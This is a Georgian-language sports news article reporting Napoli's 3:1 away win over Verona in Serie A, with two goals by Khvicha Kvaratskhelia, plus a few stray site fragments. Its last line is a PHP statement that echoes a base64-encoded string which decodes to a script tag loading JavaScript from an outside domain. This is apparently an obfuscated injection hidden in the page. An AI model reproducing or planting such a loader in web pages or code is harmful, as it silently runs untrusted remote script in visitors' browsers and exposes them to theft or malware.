celsiusi
ავერსი შნაიდერი

იტალიის ჩემპიონატში შესანიშნავი მატჩი ჩაატარა „ნაპოლიმ“, რომელიც „ვერონას“ ესტუმრა და დამაჯერებლად 3:1 დაამარცხა. 

ამ მატჩში ნეაპოლელებს ტრავმების გამო ვიქტორ ოსიმენიზამბო ანგისა და ელიფ ელმასი ვერ ეხმარებოდნენ, მიუხედავად ამ დანაკლისისა კვარაცხელიამ არაცვეულებრივი თამაში აჩვენა და გულშემატკივრების გაბედნიერება დუბლის შესრულებით და ჩვეული თავდაჯერებულობით მოახერხა.

ვერონამ“ შეხვედრა კარგად დაიწყო და საწყის წუთებში ორი სახიფათო მომენტი შექმნა, მაგრამ მერე ნეაპოლელებმა თამაში გამოასწორეს და რეალური საგოლე მომენტებიც შექმნეს.

მატეო პოლიტანოსა და ჯაკომო რასპადორის დარტყმები „ვერონას“ მეკარემ მოიგერია. თუმცა, გოლი მაინც ამ ფეხბურთელებმა გაიტანეს – 27-ე წუთზე რასპადორის გადაცემის შემდეგ, პოლიტანომ ზუსტად დაარტყა და ანგარიში გახსნა.

ამის შემდეგ კვარაცხელიამ გაიბრწყინა. საქართველოს ნაკრების თავდამსხმელმა თავის გამოჩენა 43-ე წუთზე პოლიტანოს გადაცემის შემდეგ შეძლო – ხვიცამ მახვილი კუთხიდან დაარტყა და „ვერონას“ მეკარემ რეაგირება ვერ შეძლო.

კვარაცხელიამ მეორე ტაიმშიც მოახერხა თავის გამოჩენა და ისევ პოლიტანოს შესანიშნავი თამაშის წყალობით – 55-ე წუთზე მეტოქის გადაცემა რასპადორიმ ჩაჭრა, პოლიტანომ კი საკუთარი ნახევრიდან, ერთი შეხებით, შესანიშნავი პასით კვარაცხელია ხელსაყრელ პოზიციაზე გაყვანა, ხვიჩამ კი მცველი ჩამოიშორა და „ნაპოლი 3:0 დააწინაურა.

სერბმა ნახევარმცველმა ნეაპოლელთა მცველების უხეში შეცდომით ისარგებლა და „ვერონამ“ სხვაობა დარკო ლაზოვიჩის გოლით შეამცირა.

ცხრა ტურის შემდეგ „ნაპოლიმ“ 17 ქულა დააგროვა და სერია A-ში მეხუთე პოზიციაზე დაწინაურდა, ხოლო ლიდერ „მილანთან“ ჩამორჩენა ოთხ ქულამდე შეამცირა.

აღსანისნავია, რომ ხვიჩა კვარაცხელიას იტალიის ჩემპიონატში უკვე სამი გოლი და სამი საგოლე გადაცემა დაუგროვდა. ბოლო ორ კვირაში, სანაკრებო მატჩების ჩათვლით, ხვიჩამ გოლის გატანა ზედიზედ სამ შეხვედრაში მოახერხა.

ავტორი
სანდრო ჭითანავა
402
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");